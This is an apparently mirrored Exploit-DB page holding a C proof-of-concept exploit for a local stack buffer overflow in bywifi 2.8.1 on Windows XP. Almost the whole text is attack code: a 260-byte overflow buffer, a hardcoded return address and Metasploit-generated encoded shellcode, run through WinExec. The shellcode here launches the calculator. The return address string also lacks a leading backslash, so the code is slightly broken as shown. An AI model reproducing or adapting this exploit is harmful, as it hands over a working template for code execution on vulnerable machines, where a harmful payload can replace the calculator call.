Bywifi 2.8.1 – Local Stack Buffer Overflow

  • 作者: anonymous
    日期: 2011-01-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15888/
  • /*
    # Exploit Title: [bywifi 2.8.1 stackbuffer overflow]
    # Author: [Anonymous]
    # Software Link: [bywifi.com]
    # Version: [2.8.1]
    # Tested on: [windows xp Professional French]
    # CVE : [N/a]
    */
    
    #include <windows.h>
    #include <string.h>
    #include <stdio.h>
    int main()
    {
    //file name
    char exploit[700]="bywifi.exe "; 
    //ret addr
    char ret[] = "x5D\x38\x82\x7C";
    //junk data
    char overflow[260];
    for(int i=0;i<260;i++){
    overflow[i]=0x41;
    }
    /*
    * windows/exec - 144 bytes
    * http://www.metasploit.com
    * Encoder: x86/shikata_ga_nai
    * EXITFUNC=process, CMD=calc
    */
    char shellcode[] =
    "\xbf\xdb\xf9\x8c\x6d\x31\xc9\xb1\x1e\xda\xcd\xd9\x74\x24\xf4"
    "\x58\x31\x78\x0f\x03\x78\x0f\x83\xe8\x27\x1b\x79\x91\x3f\x98"
    "\x82\x6a\xbf\xaa\xc6\x56\x34\xd0\xcd\xde\x4b\xc6\x45\x51\x53"
    "\x93\x05\x4e\x62\x48\xf0\x05\x50\x05\x02\xf4\xa9\xd9\x9c\xa4"
    "\x4d\x19\xea\xb3\x8c\x50\x1e\xbd\xcc\x8e\xd5\x86\x84\x74\x12"
    "\x8c\xc1\xfe\x45\x4a\x08\xea\x1c\x19\x06\xa7\x6b\x42\x0a\x36"
    "\x87\xf6\x2e\xb3\x56\xe2\xc7\x9f\x7c\xf0\x14\x40\x4c\x0e\xfa"
    "\x29\xca\x65\xbc\xe5\x99\x3a\x4c\x8d\xee\xa6\xe1\x1a\x66\xdf"
    "\x70\xe4\xf4\x1f\xe8\x45\x93\x6f\x66\x61\x3c\xf8\xee\x94\x48"
    "\xf6\x59\x96\xaa\x64\x04\x04\x56\x6b";
    printf("Exploiting ......\n");
    strcat(exploit, overflow);
    strcat(exploit, ret);
    strcat(exploit, shellcode);
    WinExec(exploit,0);
    printf("Exploitation Finished\n");
    return 0;
    }